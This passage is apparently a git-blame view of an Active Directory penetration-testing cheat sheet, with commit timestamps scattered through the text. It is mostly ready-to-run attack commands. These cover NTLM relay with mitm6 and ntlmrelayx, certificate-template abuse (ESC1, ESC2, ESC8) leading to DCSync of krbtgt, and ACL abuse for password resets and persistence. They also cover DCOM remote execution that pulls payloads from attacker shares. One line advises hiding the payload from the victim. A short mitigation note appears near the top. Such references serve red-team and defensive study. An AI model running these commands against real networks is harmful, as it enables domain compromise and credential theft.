# the socks proxy can then be used with your Impacket tools or CrackMapExec
$ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1
$ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth
$ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1"
2019-10-20 20:09:36 +00:00
```
2021-03-25 17:25:02 +00:00
**Mitigations**:
2019-11-16 13:53:42 +00:00
* Disable LLMNR via group policy
```powershell
Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled
```
* Disable NBT-NS
```powershell
This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP
```
2019-11-14 22:26:13 +00:00
#### SMB Signing Disabled and IPv6
Since MS16-077 the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
```powershell
2021-03-25 17:25:02 +00:00
crackmapexec smb $hosts --gen-relay-list relay.txt
2019-11-14 22:26:13 +00:00
# DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6
2021-03-25 17:25:02 +00:00
# -d is the domain name that we filter our request on - the attacked domain
# -i is the interface we have mitm6 listen on for events
2019-11-14 22:26:13 +00:00
mitm6 -i eth0 -d $domain
# spoofing WPAD and relaying NTLM credentials
2021-03-25 17:25:02 +00:00
impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt
impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug
# -ip is the interface you want the relay to run on
# -wh is for WPAD host, specifying your wpad file to serve
# -t is the target where you want to relay to.
impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2
2019-11-14 22:26:13 +00:00
```
2019-10-21 21:00:27 +00:00
#### Drop the MIC
> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP
Check vulnerability with [cve-2019-1040-scanner ](https://github.com/fox-it/cve-2019-1040-scanner )
```powershell
python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth
[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected)
```
- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD
```powershell
TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local < attacker ip / hostname >
TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support
TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
```
- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
```powershell
# create a new machine account
TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support
TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6
TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME
# connect using the ticket
export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache
secretsdump.py -k -no-pass second-dc-server.local -just-dc
```
2018-12-25 19:35:39 +00:00
2019-11-14 22:26:13 +00:00
#### Ghost Potato - CVE-2019-1384
2021-08-25 20:14:44 +00:00
Requirements:
2019-11-14 22:26:13 +00:00
* User must be a member of the local Administrators group
* User must be a member of the Backup Operators group
* Token must be elevated
Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impacket-ghostpotato.zip
```powershell
ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
```
2019-11-07 22:21:00 +00:00
2021-07-26 19:25:56 +00:00
#### RemotePotato0 DCOM DCE RPC relay
> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine
2021-08-25 20:14:44 +00:00
Requirements:
- a shell in session 0 (e.g. WinRm shell or SSH shell)
- a privileged user is logged on in the session 1 (e.g. a Domain Admin user)
2021-07-26 19:25:56 +00:00
```powershell
# https://github.com/antonioCoco/RemotePotato0/
Terminal> sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & # Can be omitted for Windows Server < = 2016
Terminal> sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1
Session0> RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2
Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135'
```
2021-08-25 20:14:44 +00:00
#### Relay delegation with mitm6
Requirements:
- IPv6 enabled (Windows prefers IPV6 over IPv4)
- LDAP over TLS (LDAPS)
> ntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it.
```powershell
git clone https://github.com/fox-it/mitm6.git
cd /opt/tools/mitm6
pip install .
mitm6 -hw ws02 -d lab.local --ignore-nofqnd
ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad
then use rubeus with s4u to relay the delegation
```
### Active Directory Certificate Services
#### ESC1 - Misconfigured Certificate Templates
> Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject.
Requirements:
* Template that allows for AD authentication
* **ENROLLEE_SUPPLIES_SUBJECT** flag
* [PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage)
Exploitation:
* Use [Certify.exe ](https://github.com/GhostPack/Certify ) to see if there are any vulnerable templates
```ps1
Certify.exe find /vulnerable
2021-09-01 12:10:53 +00:00
or
PS> Get-ADObject -LDAPFilter '(& (objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
2021-08-25 20:14:44 +00:00
```
2021-09-16 15:45:29 +00:00
* Use Certify or [Certi ](https://github.com/eloypgz/certi ) to request a Certificate and add an alternative name (user to impersonate)
2021-08-25 20:14:44 +00:00
```ps1
2021-09-16 15:45:29 +00:00
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
2021-08-25 20:14:44 +00:00
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
2021-09-16 15:45:29 +00:00
certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN
2021-08-25 20:14:44 +00:00
```
* Use OpenSSL and convert the certificate, do not enter a password
```ps1
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```
* Move the cert.pfx to the target machine filesystem and request a TGT for the altname user using Rubeus
```ps1
Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx
```
**WARNING**: These certificates will still be usable even if the user or computer resets their password!
**NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2** , **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT** , **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints.
2021-09-01 12:10:53 +00:00
#### ESC2 - Misconfigured Certificate Templates
Requirements:
* Allows requesters to specify a SAN in the CSR as well as allows Any Purpose EKU (2.5.29.37.0)
Exploitation:
* Find template
```ps1
PS > Get-ADObject -LDAPFilter '(& (objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
```
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1 ](#esc1---misconfigured-certificate-templates ).
2021-08-25 20:14:44 +00:00
#### ESC8 - AD CS Relay Attack
2021-06-24 13:26:05 +00:00
2021-08-10 21:00:19 +00:00
> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’ s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
2021-07-25 09:40:19 +00:00
Require [Impacket PR #1101 ](https://github.com/SecureAuthCorp/impacket/pull/1101 )
2021-06-24 13:26:05 +00:00
2021-07-25 09:40:19 +00:00
* Version 1: NTLM Relay + Rubeus + PetitPotam
2021-06-24 13:26:05 +00:00
```powershell
2021-07-25 09:40:19 +00:00
impacket> python3 ntlmrelayx.py -t http://< ca-server > /certsrv/certfnsh.asp -smb2support --adcs
2021-09-06 18:58:44 +00:00
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
# For a member server or workstation, the template would be "Computer".
# Other templates: workstation, DomainController, Machine, KerberosAuthentication
2021-07-25 09:40:19 +00:00
# Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
2021-07-26 19:25:56 +00:00
# You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
2021-07-25 09:40:19 +00:00
git clone https://github.com/topotam/PetitPotam
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
2021-06-24 13:26:05 +00:00
python3 dementor.py < listener > < target > -u < username > -p < password > -d < domain >
python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local
2021-07-25 09:40:19 +00:00
# Use the certificate with rubeus to request a TGT
Rubeus.exe asktgt /user:< user > /certificate:< base64-certificate > /ptt
Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt
# Now you can use the TGT to perform a DCSync
mimikatz> lsadump::dcsync /user:krbtgt
2021-06-24 13:26:05 +00:00
```
2021-07-25 09:40:19 +00:00
* Version 2: NTLM Relay + Mimikatz + Kekeo
2021-06-24 13:26:05 +00:00
```powershell
2021-07-25 09:40:19 +00:00
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Mimikatz
mimikatz> misc::efs /server:dc.lab.local /connect:< IP > /noauth
# Kekeo
kekeo> base64 /input:on
kekeo> tgt::ask /pfx:< BASE64-CERT-FROM-NTLMRELAY > /user:dc$ /domain:lab.local /ptt
# Mimikatz
mimikatz> lsadump::dcsync /user:krbtgt
2021-06-24 13:26:05 +00:00
```
2021-09-01 12:10:53 +00:00
* Version 3: ADCSPwn
```powershell
https://github.com/bats3c/ADCSPwn
adcspwn.exe --adcs < cs server > --port [local port] --remote [computer]
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
# ADCSPwn arguments
adcs - This is the address of the AD CS server which authentication will be relayed to.
secure - Use HTTPS with the certificate service.
port - The port ADCSPwn will listen on.
remote - Remote machine to trigger authentication from.
username - Username for non-domain context.
password - Password for non-domain context.
dc - Domain controller to query for Certificate Templates (LDAP).
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
output - Output path to store base64 generated crt.
```
2021-06-24 13:26:05 +00:00
2018-05-05 15:32:19 +00:00
### Dangerous Built-in Groups Usage
2018-08-12 21:30:22 +00:00
2021-04-21 20:27:07 +00:00
If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
2020-07-13 13:00:36 +00:00
2021-04-21 20:27:07 +00:00
> The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
2020-07-13 13:00:36 +00:00
Find users with `AdminCount=1` .
```powershell
2021-04-21 20:27:07 +00:00
crackmapexec ldap 10.10.10.10 -u username -p password --admin-count
# or
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.10.10.10
2020-07-13 13:00:36 +00:00
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
2021-04-21 20:27:07 +00:00
# or
2018-05-05 15:32:19 +00:00
Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
2021-04-21 20:27:07 +00:00
# or
2018-05-05 15:32:19 +00:00
([adsisearcher]"(AdminCount=1)").findall()
```
2018-03-12 08:17:31 +00:00
2019-12-30 18:55:47 +00:00
#### AdminSDHolder Abuse
2020-07-13 13:00:36 +00:00
2021-01-08 22:41:50 +00:00
> The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
2021-04-21 20:27:07 +00:00
If you modify the permissions of **AdminSDHolder** , that permission template will be pushed out to all protected accounts automatically by `SDProp` (in an hour).
2021-01-08 22:41:50 +00:00
E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group.
2019-12-30 18:55:47 +00:00
```powershell
2021-01-08 22:41:50 +00:00
# Add a user to the AdminSDHolder group:
2021-04-21 20:27:07 +00:00
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -Verbose
2021-01-08 22:41:50 +00:00
# Right to reset password for toto using the account titi
2019-12-30 18:55:47 +00:00
Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword
2021-01-08 22:41:50 +00:00
# Give all rights
2019-12-30 18:55:47 +00:00
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All
```
2019-12-30 13:22:10 +00:00
### Abusing Active Directory ACLs/ACEs
2020-05-03 14:28:17 +00:00
Check ACL for an User with [ADACLScanner ](https://github.com/canix1/ADACLScanner ).
```powershell
ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(& (AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show
```
#### GenericAll
2019-12-30 13:22:10 +00:00
* **GenericAll on User** : We can reset user's password without knowing the current password
2021-09-30 20:17:20 +00:00
* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group :
* On Windows : `net group "domain admins" spotless /add /domain`
* On Linux using the Samba software suite : `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'AttackerUser%MyPassword' -W DOMAIN -I [DC IP]`
2020-05-03 14:28:17 +00:00
2021-04-21 20:27:07 +00:00
* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it.
```powershell
# Check for interesting permissions on accounts:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
# Check if current user has already an SPN setted:
PowerView2 > Get-DomainUser -Identity < UserName > | select serviceprincipalname
2021-07-04 11:32:32 +00:00
# Force set the SPN on the account: Targeted Kerberoasting
2021-04-21 20:27:07 +00:00
PowerView2 > Set-DomainObject < UserName > -Set @{serviceprincipalname='ops/whatever1'}
2021-07-04 11:32:32 +00:00
PowerView3 > Set-DomainObject -Identity < UserName > -Set @{serviceprincipalname='any/thing'}
2021-04-21 20:27:07 +00:00
# Grab the ticket
PowerView2 > $User = Get-DomainUser username
PowerView2 > $User | Get-DomainSPNTicket | fl
PowerView2 > $User | Select serviceprincipalname
# Remove the SPN
PowerView2 > Set-DomainObject -Identity username -Clear serviceprincipalname
```
* **GenericAll/GenericWrite** : We can change a victim's **userAccountControl** to not require Kerberos preauthentication, grab the user's crackable AS-REP, and then change the setting back.
```powershell
# Modify the userAccountControl
PowerView2 > Get-DomainUser username | ConvertFrom-UACValue
PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
# Grab the ticket
PowerView2 > Get-DomainUser username | ConvertFrom-UACValue
ASREPRoast > Get-ASREPHash -Domain domain.local -UserName username
# Set back the userAccountControl
PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
PowerView2 > Get-DomainUser username | ConvertFrom-UACValue
```
2020-05-03 14:28:17 +00:00
#### GenericWrite
* Reset another user's password
2021-09-30 20:17:20 +00:00
* On Windows:
```powershell
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1
$user = 'DOMAIN\user1';
$pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds;
```
* On Linux:
```bash
# Using rpcclient from the Samba software suite
rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd"
```
2019-12-30 18:55:47 +00:00
2020-05-03 14:28:17 +00:00
* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1`
2020-08-17 13:00:04 +00:00
##### GenericWrite and Remote Connection Manager
2020-08-17 13:15:33 +00:00
> Now let’ s say you are in an Active Directory environment that still actively uses a Windows Server version that has RCM enabled, or that you are able to enable RCM on a compromised RDSH, what can we actually do ? Well each user object in Active Directory has a tab called ‘ Environment’ .
>
> This tab includes settings that, among other things, can be used to change what program is started when a user connects over the Remote Desktop Protocol (RDP) to a TS/RDSH in place of the normal graphical environment. The settings in the ‘ Starting program’ field basically function like a windows shortcut, allowing you to supply either a local or remote (UNC) path to an executable which is to be started upon connecting to the remote host. During the logon process these values will be queried by the RCM process and run whatever executable is defined. - https://sensepost.com/blog/2020/ace-to-rce/
:warning: The RCM is only active on Terminal Servers/Remote Desktop Session Hosts. The RCM has also been disabled on recent version of Windows (>2016), it requires a registry change to re-enable.
2020-08-17 13:00:04 +00:00
```powershell
$UserObject = ([ADSI]("LDAP://CN=User,OU=Users,DC=ad,DC=domain,DC=tld"))
$UserObject.TerminalServicesInitialProgram = "\\1.2.3.4\share\file.exe"
$UserObject.TerminalServicesWorkDirectory = "C:\"
$UserObject.SetInfo()
```
2020-05-03 14:28:17 +00:00
2020-08-17 13:18:30 +00:00
NOTE: To not alert the user the payload should hide its own process window and spawn the normal graphical environment.
2020-08-17 13:15:33 +00:00
2020-05-03 14:28:17 +00:00
#### WriteDACL
To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn ](https://github.com/fox-it/Invoke-ACLPwn ) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'`
2020-01-05 15:28:00 +00:00
2020-12-09 22:33:40 +00:00
* WriteDACL on Domain
```powershell
# Give DCSync right to the principal identity
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local
```
* WriteDACL on Group
```powershell
Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1
net group "INTERESTING_GROUP" User1 /add /domain
```
2020-01-05 15:28:00 +00:00
2020-09-18 19:21:55 +00:00
#### WriteOwner
An attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. This can be achieved with Set-DomainObjectOwner (PowerView module).
```powershell
Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'
```
This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group.
#### ReadLAPSPassword
2021-01-29 21:10:22 +00:00
An attacker can read the LAPS password of the computer account this ACE applies to. This can be achieved with the Active Directory PowerShell module. Detail of the exploitation can be found in the [Reading LAPS Password ](#reading-laps-password ) section.
2020-09-18 19:21:55 +00:00
```powershell
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
```
#### ReadGMSAPassword
An attacker can read the GMSA password of the account this ACE applies to. This can be achieved with the Active Directory and DSInternals PowerShell modules.
```powershell
# Save the blob to a variable
$gmsa = Get-ADServiceAccount -Identity 'SQL_HQ_Primary' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
# Decode the data structure using the DSInternals module
ConvertFrom-ADManagedPasswordBlob $mp
```
#### ForceChangePassword
An attacker can change the password of the user this ACE applies to.
This can be achieved with Set-DomainUserPassword (PowerView module).
```powershell
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword
```
2019-12-30 13:22:10 +00:00
2021-03-24 21:26:23 +00:00
### DCOM Exploitation
2021-04-21 20:27:07 +00:00
> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.
2021-09-07 12:48:57 +00:00
* Impacket DcomExec.py
```ps1
dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
dcomexec.py -share C$ -object MMC20 '< DOMAIN > /< USERNAME > :< PASSWORD > @< MACHINE_CIBLE > '
dcomexec.py -share C$ -object MMC20 '< DOMAIN > /< USERNAME > :< PASSWORD > @< MACHINE_CIBLE > ' 'ipconfig'
```
2021-04-21 20:27:07 +00:00
* CheeseTools - https://github.com/klezVirus/CheeseTools
```powershell
2021-06-28 20:08:06 +00:00
# https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/
2021-04-21 20:27:07 +00:00
-t, --target=VALUE Target Machine
-b, --binary=VALUE Binary: powershell.exe
-a, --args=VALUE Arguments: -enc < blah >
-m, --method=VALUE Methods: MMC20Application, ShellWindows,
ShellBrowserWindow, ExcelDDE, VisioAddonEx,
OutlookShellEx, ExcelXLL, VisioExecLine,
OfficeMacro
-r, --reg, --registry Enable registry manipulation
-h, -?, --help Show Help
Current Methods: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro.
```
2021-06-28 20:08:06 +00:00
* Invoke-DCOM - https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1
```powershell
Import-Module .\Invoke-DCOM.ps1
Invoke-DCOM -ComputerName '10.10.10.10' -Method MMC20.Application -Command "calc.exe"
Invoke-DCOM -ComputerName '10.10.10.10' -Method ExcelDDE -Command "calc.exe"
Invoke-DCOM -ComputerName '10.10.10.10' -Method ServiceStart "MyService"
Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellBrowserWindow -Command "calc.exe"
Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellWindows -Command "calc.exe"
```
2021-03-24 21:26:23 +00:00
#### DCOM via MMC Application Class
This COM object (MMC20.Application) allows you to script components of MMC snap-in operations. there is a method named ** "ExecuteShellCommand"** under **Document.ActiveView** .
```ps1
PS C:\> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1"))
PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7)
PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string > ","7")
# Weaponized example with MSBuild
PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",$null,"\\10.10.10.2\webdav\build.xml","7")
```
Invoke-MMC20RCE : https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1
2021-04-21 20:27:07 +00:00
#### DCOM via Office
* Excel.Application
* DDEInitiate
* RegisterXLL
* Outlook.Application
* CreateObject->Shell.Application->ShellExecute
* CreateObject->ScriptControl (office-32bit only)
* Visio.InvisibleApp (same as Visio.Application, but should not show the Visio window)
* Addons
* ExecuteLine
* Word.Application
* RunAutoMacro
2021-03-24 21:26:23 +00:00
```ps1
# Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM
Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9
Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a
# Using Excel DDE
PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
PS C:\> $excel.DisplayAlerts = $false
PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe")
2021-04-21 20:27:07 +00:00
# Using Excel RegisterXLL
# Can't be used reliably with a remote target
Require: reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1
PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
PS> $excel.RegisterXLL("EvilXLL.dll")
# Using Visio
$visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName"))
$visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc")
2021-03-24 21:26:23 +00:00
```
#### DCOM via ShellExecute
```ps1
$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.1")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
```
#### DCOM via ShellBrowserWindow
:warning: Windows 10 only, the object doesn't exists in Windows 7
```ps1
$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1")
$obj = [System.Activator]::CreateInstance($com)
$obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
```
2018-07-15 09:06:43 +00:00
### Trust relationship between domains
2018-08-12 21:30:22 +00:00
2020-01-05 21:11:28 +00:00
* One-way
* Domain B trusts A
* Users in Domain A can access resources in Domain B
* Users in Domain B cannot access resources in Domain A
* Two-way
* Domain A trusts Domain B
* Domain B trusts Domain A
* Authentication requests can be passed between the two domains in both directions
#### Enumerate trusts between domains
2018-07-15 09:06:43 +00:00
```powershell
nltest /trusted_domains
```
2018-08-12 21:30:22 +00:00
or
2018-07-15 09:06:43 +00:00
```powershell
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
SourceName TargetName TrustType TrustDirection
---------- ---------- --------- --------------
domainA.local domainB.local TreeRoot Bidirectional
```
2018-03-12 08:17:31 +00:00
2020-01-05 21:11:28 +00:00
#### Exploit trusts between domains
:warning: Require a Domain-Admin level access to the current domain.
| Source | Target | Technique to use | Trust relationship |
|---|---|---|---|
| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) |
| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) |
| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) |
| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) |
2019-11-07 22:21:00 +00:00
### Child Domain to Forest Compromise - SID Hijacking
Most trees are linked with dual sided trust relationships to allow for sharing of resources.
By default the first domain created if the Forest Root.
2021-04-21 20:27:07 +00:00
**Requirements**:
2019-11-07 22:21:00 +00:00
- KRBTGT Hash
- Find the SID of the domain
```powershell
$ Convert-NameToSid target.domain.com\krbtgt
